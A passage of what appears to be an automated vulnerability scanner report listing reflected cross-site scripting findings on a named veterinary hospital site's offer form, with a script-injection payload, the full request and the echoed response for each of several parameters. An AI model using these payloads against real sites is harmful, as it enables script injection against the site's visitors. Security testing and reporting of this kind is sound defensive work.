Date: Sat, 05 Mar 2011 12:17:59 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?=3&state=FLce804"><script>alert(1)</script>ee024cf54a8&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.75. http://www.vcahospitals.com/main/offer/ [submit parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b158"><script>alert(1)</script>2bba563e314 was submitted in the submit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon6b158"><script>alert(1)</script>2bba563e314&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:09 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ga94m4jju2j64t9htmvidu7h93; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon6b158"><script>alert(1)</script>2bba563e314&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26gui
...[SNIP]...

2.76. http://www.vcahospitals.com/main/offer/ [token parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be60f"><script>alert(1)</script>0efb51ecb80 was submitted in the token parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fdbe60f"><script>alert(1)</script>0efb51ecb80&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:15 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=s4bduitjbvoil74qo6fal13d00; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
lla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fdbe60f"><script>alert(1)</script>0efb51ecb80&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF
...[SNIP]...

2.77. http://www.vcahospitals.com/main/offer/ [tollfree parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the tollfree request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a5ed"><script>alert(1)</script>e20dadccfe7 was submitted in the tollfree parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-84161a5ed"><script>alert(1)</script>e20dadccfe7&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ads2nfd0qnf81gp16ap84q27u0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
ble%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-84161a5ed"><script>alert(1)</script>e20dadccfe7&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.19
...[SNIP]...

2.78. http://www.vcahospitals.com/main/offer/ [uri parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a040b"><script>alert(1)</script>f73da84759e was submitted in the uri parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3da040b"><script>alert(1)</script>f73da84759e&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:25 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=r8ti6pm5ktq8n70m0nl6japfn5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
52bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3da040b"><script>alert(1)</script>f73da84759e&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.79. http://www.vcahospitals.com/main/offer/ [useragent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the useragent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de3a3"><script>alert(1)</script>7d71969fe0c was submitted in the useragent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)de3a3"><script>alert(1)</script>7d71969fe0c&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:30 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hmp8degbpu0a9te26g939re5u0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)de3a3"><script>alert(1)</script>7d71969fe0c&variant=&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.80. http://www.vcahospitals.com/main/offer/ [variant parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the variant request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e180"><script>alert(1)</script>28aed0a1907 was submitted in the variant parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%